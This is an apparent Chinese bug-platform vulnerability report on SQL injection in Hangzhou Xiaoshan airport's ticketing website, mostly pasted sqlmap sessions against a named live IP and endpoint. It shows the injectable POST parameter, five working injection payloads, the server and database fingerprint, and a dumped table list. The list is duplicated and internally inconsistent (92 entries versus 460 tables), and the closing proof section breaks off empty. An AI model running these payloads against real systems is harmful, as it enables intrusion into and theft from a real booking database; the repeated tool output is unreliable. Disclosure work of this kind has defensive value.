漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-02-03:	细节已通知厂商并且等待厂商处理中
									2015-02-06:	厂商已经确认,细节仅向厂商公开
									2015-02-16:	细节向核心白帽子及相关领域专家公开
									2015-02-26:	细节向普通白帽子公开
									2015-03-08:	细节向实习白帽子公开
									2015-03-20:	细节向公众公开
								
简要描述:
最近新闻一直报道机场的事情,于是便来一发
详细说明:
首先目标锁定在杭州萧山国际机场
http://www.hzairport.com
然后进入机票订购网站
http://jipiao.hzairport.com
一顿测试后竟然无果,奈何本屌丝无奈至极,于是再次操着蜗牛般的网速上了
首先ping一下jipiao.hzairport.com得到ip
然后我把ip替代了域名,于是乎,神奇的一幕出现了
http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx
存在post注入
payload:
__VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634
然后直接sqlmap上
随便找了一个
Database: AirportTest                                                          
[460 tables]
+-------------------------+
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| City                    |
| City                    |
| City                    |
| City                    |
| City                    |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| Department              |
| Department              |
| Department              |
| Department              |
| Department              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
+-------------------------+
[11:38:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:38:00
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:24
[11:45:24] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:45:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:45:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/60.191.78.34'
[*] shutting down at 11:45:25
root@hughlvan:/# sqlmap -u "http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx" --data "__VIEWSTATE=%2FwEPDwULLTE2MzEzMzk3NjJkZA%3D%3D&btnEdit=%E6%8F%90%20%E4%BA%A4&__EVENTVALIDATION=%2FwEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634" -D AirportTest --table
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:46:25
[11:46:26] [INFO] resuming back-end DBMS 'microsoft sql server' 
[11:46:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: tbOrderID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; IF(6687=6687) SELECT 6687 ELSE DROP FUNCTION sthL--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' AND 3469=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (3469=3469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113))) AND 'bngz'='bngz
    Type: UNION query
    Title: Generic UNION query (NULL) - 41 columns
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(102)+CHAR(109)+CHAR(121)+CHAR(113)+CHAR(105)+CHAR(117)+CHAR(84)+CHAR(75)+CHAR(116)+CHAR(68)+CHAR(86)+CHAR(67)+CHAR(65)+CHAR(109)+CHAR(113)+CHAR(119)+CHAR(121)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE2MzEzMzk3NjJkZA==&btnEdit=%E6%8F%90 %E4%BA%A4&__EVENTVALIDATION=/wEWAwKFiYBZApq3xNwMArbhq80N&tbOrderID=88952634' WAITFOR DELAY '0:0:5'--
---
[11:46:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[11:46:26] [INFO] fetching tables for database: AirportTest
[11:46:26] [INFO] the SQL query used returns 92 entries
Database: AirportTest                                                          
[460 tables]
+-------------------------+
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| Airline                 |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AirlineRebate           |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| AliPayLog               |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| Annoucement             |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| ApplyTransfer           |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankKeyAndValue         |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankOrderLog            |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BankReturnLog           |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillRecordApplyLog      |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| BillType                |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Bill_Heavier            |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| Billrecords             |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Rebates              |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CW_Verification         |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| CabinRank               |
| City                    |
| City                    |
| City                    |
| City                    |
| City                    |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CompanyType             |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CounterDeliveryAddress  |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| CusQichu                |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_ApplyRepayDetail     |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_BackNotice           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_InsureSale           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_OverWeight           |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_arrearsNoticeChange  |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_paying               |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| Cw_receipt              |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DataValidaLog           |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| DeliveryAddress         |
| Department              |
| Department              |
| Department              |
| Department              |
| Department              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermExecl              |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| EtermFile               |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| InsertUsered2           |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OperationLog            |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderAbnormal           |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| OrderState              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| Payforment              |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| PiaoJia                 |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSErrorInfo            |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SMSmessageLog           |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| SaleSummary             |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TSLCommandLog           |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| TypeFly                 |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| U1                      |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| Unit                    |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| ZheKou                  |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| dtproperties            |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| keys                    |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| orders2                 |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| sysconstraints          |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| syssegments             |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbAdmin                 |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbBreakOrder            |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbChangeApplication     |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbInternation           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbListsDetail           |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbLowestMonthPrice      |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNews                  |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbNoticeMent            |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbParameter             |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbRequirement           |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbSpecialTicket         |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tbTermDemand            |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountClass         |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountCommonContact |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_accountEvent         |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_commonName           |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_creditAmount         |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_orderDetail          |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| tc_type                 |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_ErrorData             |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_Piaojia               |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SMSmessageLog         |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_SaleDetail            |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tblistsDetail         |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_account            |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| v_tc_orderDetail        |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_js                 |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsqxdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_jsyhdyb            |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_qx                 |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
| yaeb_yhqxdyb            |
+-------------------------+
网速不行 就不深入。
 
漏洞证明:
http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx
存在post注入
payload:
